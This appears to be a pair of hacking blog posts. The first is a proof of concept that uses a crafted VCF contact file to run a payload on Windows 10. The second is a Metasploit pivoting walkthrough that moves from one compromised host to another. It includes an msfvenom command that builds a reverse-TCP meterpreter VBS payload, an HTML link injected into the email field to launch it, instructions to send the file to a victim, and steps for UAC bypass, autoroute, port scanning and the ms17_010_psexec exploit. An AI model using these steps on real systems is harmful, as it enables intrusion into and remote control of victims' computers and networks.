Exploiting Windows using malicious VCF file

John Page a cyber security researcher brought this vulnerability, which was a 0 day exploit working on latest windows 10 too.

Introduction: He discovered that if we replace the website in a VCF file with the local path of a ".cpl" file, it tends to install that file instead of opening it on browser. This is done by replacing "http://" with "http.\\" or we can also inject some html in email field to do same and when user clicks on it we get a shell. (This exploit uses human interaction)

Proof Of Concept:


1.   We need to create a simple payload. ( I used msfvenom and selected format as ".vbs")

       msfvenom -p windows/meterpreter/reverse_tcp lhost=<IP> lport=<lport> -f vbs > <file_name>.vbs

2.   Inject html with href value to payload file name inside email field (Both files present in same folder). And save the file

      <a href="shell.vbs">alokkumar@gmail.com</a>

3.   Now we have to send this folder to the victim.

4.   Set up multi/handler with proper options in metasploit and wait for victim to click on link

5.   When user clicks on link we get a shell.

This exploit needs user interaction although its a 0 day. Post your comments below, Thanks for reading.

Metasploit Pivoting - (Roaming through hacked network)

Metasploit Pivoting

What is Metasploit Pivoting?

Pivoting is a technique that Metasploit uses to route the traffic from a hacked computer toward other networks that are not accessible by a hacker machine. By using this technique a Penetration Tester can access the internal network of the compromised computer.

--Attacker End--

Operating System - Parrot OS

Network Range - 192.168.43.0/24

IP Address - 192.168.43.134

--Victim Network--

Operating System (Of 1st victim) - Windows 7 (Build 7600)
Operating System (Of 2nd victim) - Windows XP

Network Range - 192.168.31.0/24

IP Address (Of 1st victim) - 192.168.31.142
IP Address (Of 2nd victim) - 192.168.31.139

Performing Metasploit Pivoting is done in following steps:-

1. At least one compromised machine on the target network (This can be done by many ways like Social Engineering, yes it works. I used payload generated by msfvenom).
2. When we have meterpreter access, We have to bypass UAC (User Account Control) on the hacked machine.
3. Run autoroute script in metasploit.
4. Then we can use tcp port scanner in auxilary module for listing connected machines with their open ports ( I scanned for specific port 445 ).
5. After attacking the vulnerable machine we can own that too.

I performed this attack on vmware,

1. Exploited first machine by transfering the payload to victim (192.168.31.142) and got meterpreter    session here.

2. We can use exploit "windows/local/bypassuac_injection" in order to bypass UAC. Set session id in options and run the exploit. It will open an another session but this time with bypasssed UAC.

3. Now we have to run the autoroute script "post/multi/manage/autoroute" by setting all the required options to add all subnets to our route.

4. We can use tcp port scanner in auxilary module "auxilary/scanner/portscan/tcp" to scan connected devices with their open ports by which we can scan for vulnerabilities. Set "rhosts",  "ports" (I searched for port 445), "threads" in options and run the exploit.

5. As we can see our 2nd victim has a port open on 445. I am using exploit ms17_010_psexec (vulnerability was known to me). We have to set all the required options for the exploit and then run it. This will give us a meterpreter on the 2nd victim.

In this way we can exploit the internal network by pivoting in metasploit.

Thank you for giving your time to read this article. Feel free to post your suggestions in comment section below.